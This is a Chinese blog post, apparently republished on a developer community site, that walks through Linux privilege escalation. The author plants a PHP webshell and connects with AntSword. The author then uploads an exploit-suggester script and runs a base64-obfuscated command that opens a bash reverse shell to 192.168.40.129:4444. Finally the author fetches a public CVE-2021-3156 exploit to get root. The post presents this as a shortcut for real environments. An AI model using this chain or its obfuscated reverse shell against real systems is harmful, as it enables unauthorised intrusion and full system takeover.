前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Linux提权脚本

Linux提权脚本

作者头像
Elapse
发布2021-04-26 15:05:16
4.1K0
发布2021-04-26 15:05:16
举报
文章被收录于专栏:E条咸鱼

前言

实际环境中会遇到过很多有shell但是权限不够的情况,那么对于我这种对内核提权的知识只存在脏牛提权的懒狗来说,最方便快捷的方式就是拿脚本来批量看当前版本的内核有哪些可以利用的脚本

正文

先搭建个环境

在php环境里写个一句话

拿蚁剑连接

虚拟终端运行,查看权限

上传自动根据内核看提权的脚本

代码语言:javascript
复制
github:https://github.com/mzet-/linux-exploit-suggester

通过一句话木马上传该.sh文件

赋7权限,可执行

操作完毕后,在蚁剑的虚拟终端中执行脚本

可以看到当前版本的内核有挺多可以利用的漏洞的,我这里挑一个CVE-2021-3156演示

使用命令反弹一个shell回来

代码语言:javascript
复制
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDAuMTI5LzQ0NDQgMD4mMQ== | base64,-d | bash,-i

下载地址

代码语言:javascript
复制
https://codeload.github.com/blasty/CVE-2021-3156/zip/main

下载完后,还是通过一句话木马上传上去

ubuntu系统一般都是自带python的,所以上传上去后,直接执行,可以看到已经root

懒狗必备傻瓜式脚本

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-04-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 E条咸鱼 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 正文
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档